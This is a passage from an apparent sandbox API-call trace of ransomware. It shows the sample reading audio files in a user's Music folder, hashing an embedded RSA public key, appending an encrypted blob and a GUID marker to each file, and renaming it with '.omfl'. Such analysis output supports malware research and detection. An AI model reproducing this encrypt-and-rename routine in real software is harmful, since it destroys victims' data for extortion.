KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.334] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.334] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.334] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.334] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.335] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.335] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.335] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.335] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.335] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.335] GetLastError () returned 0x0 [0131.336] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.336] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.336] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.336] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.336] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.336] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.336] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.336] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.337] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x11d94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.337] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.337] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.337] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.337] CloseHandle (hObject=0x5c8) returned 1 [0131.340] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.340] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0131.340] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nXXZ9Lp7ZqJfxas0PNS.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nxxz9lp7zqjfxas0pns.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\nXXZ9Lp7ZqJfxas0PNS.wav.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nxxz9lp7zqjfxas0pns.wav.omfl")) returned 1 [0131.354] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfef45dc0, ftCreationTime.dwHighDateTime=0x1d5e054, ftLastAccessTime.dwLowDateTime=0x779f35b0, ftLastAccessTime.dwHighDateTime=0x1d5d7db, ftLastWriteTime.dwLowDateTime=0x779f35b0, ftLastWriteTime.dwHighDateTime=0x1d5d7db, nFileSizeHigh=0x0, nFileSizeLow=0xf31a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PWXjlc9QYoaPii9lvoc.m4a", cAlternateFileName="PWXJLC~1.M4A")) returned 1 [0131.359] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.359] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.359] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PWXjlc9QYoaPii9lvoc.m4a") returned=".m4a" [0131.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PWXjlc9QYoaPii9lvoc.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pwxjlc9qyoapii9lvoc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.360] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=62234) returned 1 [0131.360] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.363] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xf2f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.363] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.364] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.364] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xf31a, lpOverlapped=0x0) returned 1 [0131.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.365] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.365] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3110) returned 1 [0131.366] CryptCreateHash (in: hProv=0x49d3110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.366] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.366] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.366] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.366] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.366] GetLastError () returned 0x0 [0131.366] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.366] CryptReleaseContext (hProv=0x49d3110, dwFlags=0x0) returned 1 [0131.367] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.367] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.367] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.367] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.367] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.367] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.368] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xf31a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.368] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.368] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.368] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.368] CloseHandle (hObject=0x5c8) returned 1 [0131.370] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3110 [0131.370] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0131.370] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PWXjlc9QYoaPii9lvoc.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pwxjlc9qyoapii9lvoc.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PWXjlc9QYoaPii9lvoc.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pwxjlc9qyoapii9lvoc.m4a.omfl")) returned 1 [0131.372] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cf8af70, ftCreationTime.dwHighDateTime=0x1d5d7dd, ftLastAccessTime.dwLowDateTime=0xad17dc0, ftLastAccessTime.dwHighDateTime=0x1d5db47, ftLastWriteTime.dwLowDateTime=0xad17dc0, ftLastWriteTime.dwHighDateTime=0x1d5db47, nFileSizeHigh=0x0, nFileSizeLow=0x22f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p_4G0FiIWF1KtsP.wav", cAlternateFileName="P_4G0F~1.WAV")) returned 1 [0131.372] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.372] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.372] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\p_4G0FiIWF1KtsP.wav") returned=".wav" [0131.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\p_4G0FiIWF1KtsP.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\p_4g0fiiwf1ktsp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.373] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=8947) returned 1 [0131.373] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.376] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x22cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.376] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.377] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x22f3, lpOverlapped=0x0) returned 1 [0131.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.377] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.377] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.378] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.378] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.378] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.378] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.378] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.378] GetLastError () returned 0x0 [0131.378] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.378] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.378] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.378] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.378] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.378] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.379] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.379] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.379] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x22f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.379] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.380] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.380] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.380] CloseHandle (hObject=0x5c8) returned 1 [0131.384] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.384] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.384] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\p_4G0FiIWF1KtsP.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\p_4g0fiiwf1ktsp.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\p_4G0FiIWF1KtsP.wav.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\p_4g0fiiwf1ktsp.wav.omfl")) returned 1 [0131.386] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816369a0, ftCreationTime.dwHighDateTime=0x1d5e77a, ftLastAccessTime.dwLowDateTime=0xbd2833e0, ftLastAccessTime.dwHighDateTime=0x1d5def5, ftLastWriteTime.dwLowDateTime=0xbd2833e0, ftLastWriteTime.dwHighDateTime=0x1d5def5, nFileSizeHigh=0x0, nFileSizeLow=0x6b62, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rIfEXNPea6q 7d_rR.m4a", cAlternateFileName="RIFEXN~1.M4A")) returned 1 [0131.386] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.386] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.386] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rIfEXNPea6q 7d_rR.m4a") returned=".m4a" [0131.386] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rIfEXNPea6q 7d_rR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rifexnpea6q 7d_rr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.387] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=27490) returned 1 [0131.387] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.389] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x6b3c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.389] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.390] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.390] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x6b62, lpOverlapped=0x0) returned 1 [0131.390] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.390] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.390] lstrlenA (lpString="-----BEGIN PUBLIC 